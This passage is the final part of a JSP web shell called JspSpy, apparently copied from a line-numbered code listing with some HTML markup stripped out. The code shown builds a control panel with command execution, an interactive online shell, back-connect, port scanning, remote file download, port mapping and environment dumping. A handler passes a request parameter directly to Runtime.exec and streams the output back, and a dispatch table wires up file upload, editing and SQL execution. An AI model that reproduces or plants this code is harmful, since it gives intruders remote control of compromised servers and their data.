System Environment >>

    "); 2080 | Map envs = System.getenv(); 2081 | Set> entrySet = envs.entrySet(); 2082 | for (Map.Entry en:entrySet) { 2083 | out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); 2084 | } 2085 | out.println("
"); 2088 | } catch (Exception e) { 2089 | e.printStackTrace(); 2090 | throw e ; 2091 | } 2092 | } 2093 | } 2094 | private static class TopInvoker extends DefaultInvoker { 2095 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2096 | try { 2097 | PrintWriter out = response.getWriter(); 2098 | out.println("
"+ 2099 | ""+ 2100 | " "+ 2101 | " "+ 2102 | " "+ 2103 | " "+ 2104 | " "+ 2117 | "
JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
Logout | "+ 2105 | " File Manager | "+ 2106 | " DataBase Manager | "+ 2107 | " Execute Command | "+ 2108 | " Shell OnLine | "+ 2109 | " Back Connect | "+ 2110 | " Port Scan | "+ 2111 | " Download Remote File | "+ 2112 | " ClipBoard | "+ 2113 | " Remote Control | "+ 2114 | " Port Map | "+ 2115 | " JSP Env "+ 2116 | "
"); 2118 | if (JSession.getAttribute(MSG) != null) { 2119 | Util.outMsg(out,JSession.getAttribute(MSG).toString()); 2120 | JSession.removeAttribute(MSG); 2121 | } 2122 | } catch (Exception e) { 2123 | e.printStackTrace(); 2124 | throw e ; 2125 | } 2126 | } 2127 | } 2128 | private static class VOnLineShellInvoker extends DefaultInvoker { 2129 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2130 | try { 2131 | PrintWriter out = response.getWriter(); 2132 | out.println(""); 2158 | out.println(""+ 2159 | " "+ 2160 | " "+ 2200 | " "+ 2201 | "
"); 2161 | out.println("

Shell OnLine »


"); 2162 | out.println("
"+ 2163 | " "+ 2164 | " "+ 2165 | " Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ 2166 | "
"+ 2167 | "
"+ 2168 | " "+ 2170 | "
"+ 2171 | " "+ 2172 | " "+ 2173 | " "+ 2194 | " Auto Scroll"+ 2195 | " "+ 2196 | "
"+ 2197 | " " 2198 | ); 2199 | out.println("
"); 2202 | } catch (Exception e) { 2203 | e.printStackTrace(); 2204 | throw e ; 2205 | } 2206 | } 2207 | } 2208 | private static class OnLineInvoker extends DefaultInvoker { 2209 | public boolean doBefore(){return false;} 2210 | public boolean doAfter(){return false;} 2211 | public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ 2212 | try { 2213 | String type = request.getParameter("type"); 2214 | if (Util.isEmpty(type)) 2215 | return; 2216 | if (type.toLowerCase().equals("start")) { 2217 | String exe = request.getParameter("exe"); 2218 | if (Util.isEmpty(exe)) 2219 | return; 2220 | Process pro = Runtime.getRuntime().exec(exe); 2221 | ByteArrayOutputStream outs = new ByteArrayOutputStream(); 2222 | response.setContentLength(100000000); 2223 | response.setContentType("text/html;charset="+Charset.defaultCharset().name()); 2224 | OnLineProcess olp = new OnLineProcess(pro); 2225 | JSession.setAttribute(SHELL_ONLINE,olp); 2226 | new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); 2227 | new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); 2228 | new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 2229 | Thread.sleep(1000 * 60 * 60 * 24); 2230 | } else if (type.equals("ecmd")) { 2231 | Object o = JSession.getAttribute(SHELL_ONLINE); 2232 | String cmd = request.getParameter("cmd"); 2233 | if (Util.isEmpty(cmd)) 2234 | return; 2235 | if (o == null) 2236 | return; 2237 | OnLineProcess olp = (OnLineProcess)o; 2238 | olp.setCmd(cmd); 2239 | } else { 2240 | Object o = JSession.getAttribute(SHELL_ONLINE); 2241 | if (o == null) 2242 | return; 2243 | OnLineProcess olp = (OnLineProcess)o; 2244 | olp.stop(); 2245 | } 2246 | } catch (Exception e) { 2247 | e.printStackTrace(); 2248 | throw e ; 2249 | } 2250 | } 2251 | } 2252 | 2253 | static{ 2254 | ins.put("script",new ScriptInvoker()); 2255 | ins.put("before",new BeforeInvoker()); 2256 | ins.put("after",new AfterInvoker()); 2257 | ins.put("deleteBatch",new DeleteBatchInvoker()); 2258 | ins.put("clipboard",new ClipBoardInvoker()); 2259 | ins.put("vRemoteControl",new VRemoteControlInvoker()); 2260 | ins.put("gc",new GcInvoker()); 2261 | ins.put("vPortScan",new VPortScanInvoker()); 2262 | ins.put("portScan",new PortScanInvoker()); 2263 | ins.put("vConn",new VConnInvoker()); 2264 | ins.put("dbc",new DbcInvoker()); 2265 | ins.put("executesql",new ExecuteSQLInvoker()); 2266 | ins.put("vLogin",new VLoginInvoker()); 2267 | ins.put("login",new LoginInvoker()); 2268 | ins.put("filelist", new FileListInvoker()); 2269 | ins.put("logout",new LogoutInvoker()); 2270 | ins.put("upload",new UploadInvoker()); 2271 | ins.put("copy",new CopyInvoker()); 2272 | ins.put("bottom",new BottomInvoker()); 2273 | ins.put("vCreateFile",new VCreateFileInvoker()); 2274 | ins.put("vEdit",new VEditInvoker()); 2275 | ins.put("createFile",new CreateFileInvoker()); 2276 | ins.put("vEditProperty",new VEditPropertyInvoker()); 2277 | ins.put("editProperty",new EditPropertyInvoker()); 2278 | ins.put("vs",new VsInvoker()); 2279 | ins.put("shell",new ShellInvoker()); 2280 | ins.put("down",new DownInvoker()); 2281 | ins.put("vd",new VdInvoker()); 2282 | ins.put("downRemote",new DownRemoteInvoker()); 2283 | ins.put("index",new IndexInvoker()); 2284 | ins.put("mkdir",new MkDirInvoker()); 2285 | ins.put("move",new MoveInvoker()); 2286 | ins.put("removedir",new RemoteDirInvoker()); 2287 | ins.put("packBatch",new PackBatchInvoker()); 2288 | ins.put("pack",new PackInvoker()); 2289 | ins.put("unpack",new UnPackInvoker()); 2290 | ins.put("vmp",new VmpInvoker()); 2291 | ins.put("vbc",new VbcInvoker()); 2292 | ins.put("backConnect",new BackConnectInvoker()); 2293 | ins.put("jspEnv",new JspEnvInvoker()); 2294 | ins.put("smp",new SmpInvoker()); 2295 | ins.put("mapPort",new MapPortInvoker()); 2296 | ins.put("top",new TopInvoker()); 2297 | ins.put("vso",new VOnLineShellInvoker()); 2298 | ins.put("online",new OnLineInvoker()); 2299 | } 2300 | %> 2301 | <% 2302 | try { 2303 | String o = request.getParameter("o"); 2304 | if (!Util.isEmpty(o)) { 2305 | Invoker in = ins.get(o); 2306 | if (in == null) { 2307 | response.sendRedirect(SHELL_NAME+"?o=index"); 2308 | } else { 2309 | if (in.doBefore()) { 2310 | String path = request.getParameter("folder"); 2311 | if (!Util.isEmpty(path)) 2312 | session.setAttribute(CURRENT_DIR,path); 2313 | ins.get("before").invoke(request,response,session); 2314 | ins.get("script").invoke(request,response,session); 2315 | ins.get("top").invoke(request,response,session); 2316 | } 2317 | in.invoke(request,response,session); 2318 | if (!in.doAfter()) { 2319 | return; 2320 | }else{ 2321 | ins.get("bottom").invoke(request,response,session); 2322 | ins.get("after").invoke(request,response,session); 2323 | } 2324 | } 2325 | } else { 2326 | response.sendRedirect(SHELL_NAME+"?o=index"); 2327 | } 2328 | } catch (Exception e) { 2329 | ByteArrayOutputStream bout = new ByteArrayOutputStream(); 2330 | e.printStackTrace(new PrintStream(bout)); 2331 | session.setAttribute(CURRENT_DIR,SHELL_DIR); 2332 | Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"),"left"); 2333 | bout.close(); 2334 | out.flush(); 2335 | ins.get("bottom").invoke(request,response,session); 2336 | ins.get("after").invoke(request,response,session); 2337 | } 2338 | %> 2339 | --------------------------------------------------------------------------------